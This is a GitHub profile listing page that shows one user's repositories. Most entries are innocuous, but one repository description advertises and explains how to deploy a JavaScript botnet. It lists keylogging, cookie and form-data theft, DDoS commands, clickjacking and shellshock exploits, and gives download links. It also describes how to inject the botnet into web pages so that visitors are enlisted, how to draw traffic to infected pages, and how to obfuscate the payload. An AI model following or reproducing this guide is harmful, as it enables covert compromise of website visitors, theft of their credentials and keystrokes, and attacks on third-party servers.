5l1v3r1 Goto Github PK

followers: 812.0 following: 4.7K repos: 50.0K gists: 215.0

Name: 5l1v3r1

Type: User

5l1v3r1's Projects

clonymccloneface

Clone all your github repos AND set upstream for your forks

cloralang

Clora Programming Language for Code Golfing

closerlookfewshot

source code to ICLR'19, 'A Closer Look at Few-shot Classification'

clotho-dataset

Python code for handling the Clotho dataset.

cloud-9-javascript-botnet-version-2.0

I have heavily updated the Cloud 9 JavaScript BotNet Old features: FTP flood Cookie stealing Keylogging Send POST requests Flood POST requests Evaluate JavaScript Code Silently load webpages Clickjacking (iframe follow mouse) New features: Layer 4 / Layer 7 hybrid attack (random min-max size POST flood) Formgrabber fixed (I think) Now has config file Now has bots online list OS detection added Panel is much more sleek You no longer get negative bots when bots repeatedly disconnect or some glitch happens RFI scanner added Added ability to send shellshock exploits You can now open pop-unders Non-DDoS commands run only once Many security updates to the panel The features are: Code Stealerz: cookie clipboard Money makerz: view*[url]* jack*[iframe]*[width]*[height]* popunder*[url]* DDoS Methodz: load*[target url]*[milliseconds between requests]* floodpost*[target url]*[params]*[milliseconds between requests]* glype*[target url]*[glype list url]*[milliseconds between requests]* antiddos*[target url]*[milliseconds between requests]* layer4*[target url]*[minSize-maxSize]*[milliseconds between requests]* Exploitz: exploit*[exe url]* rfiscanner*[target url]*[backdoor url]*[rfi vuln list url]* sendshellshock*[target url]*[command]* Misc: md5*[hash]*[brute length]*[brute alphabet]* sha1*[hash]*[brute length]*[brute alphabet]* post*[url]*[params]* eval*[javascript code]* Always running: Multi-Language Web Keylogger Form Grabber Here is the download link to the botnet (all updates will be here): http://robl0x.cf/cloud9-latest.zip Mirror (will also be updated): http://boatnet.us/Archive/Botnet%20Files...latest.zip Unzip the folder on you server Then edit campaign.js and set master to your servers IP Edit admin/panel4829.php and set a new username and password for the cnc panel One way of getting tons of browsers on your net use traffic exchange sites like hitleap.com or 10khits.com To FTP flood use this command: Code load*ftp://website.com:80/*0* That command will exhaust all of the connections on a webserver with only a few browsers All keylogs that are recorded are sent once the page is closed for stealth To infect a page simply put this html on it: http://pastebin.com/ZAvqJZD8 the first inject is reccommended but it only works if a <head> tag exists on the page. Then whoever visits the page will be on the botnet for as long as they are on the page. I suggest putting a movie on the page so people will stay on the botnet for longer. (Good for ddos attacks) For those of you who dont know the purposes of this botnet are: Website monitoring Ad clicks amd views Getting facebook likes (via clickjacking) Distributed hash cracking Distributed Denial of Service (DDoS) Data stealing IP grabbing Exploiting servers and many more! Here is a picture of an active Cloud 9 botnet with 23 clients (this was before OS detection was added) Spoiler (Click to View) Hope you all love the update! If you have any suggestions for new features send me a PM and I should reply in 1-3 days Here is how to set it up: Code You need to change the master variable in campaign.js to something like this: var master = "http://yoursiteorip"; Also change the connection key for security. var connectKey = "randomshithere"; Also be sure to edit config.php and change the connection key to the one in campaign.js Also in the config it is reccommended that you change the location of the log files and other file locations etc. Be sure to rename/move the files to the places you specified in the config. Once you are done those things obfuscate your campaign.js using this JavaScript obfuscator (or a different one) http://javascriptobfuscator.com/Javascript-Obfuscator.aspx That will protect your campaign.js from people figuring out what it is.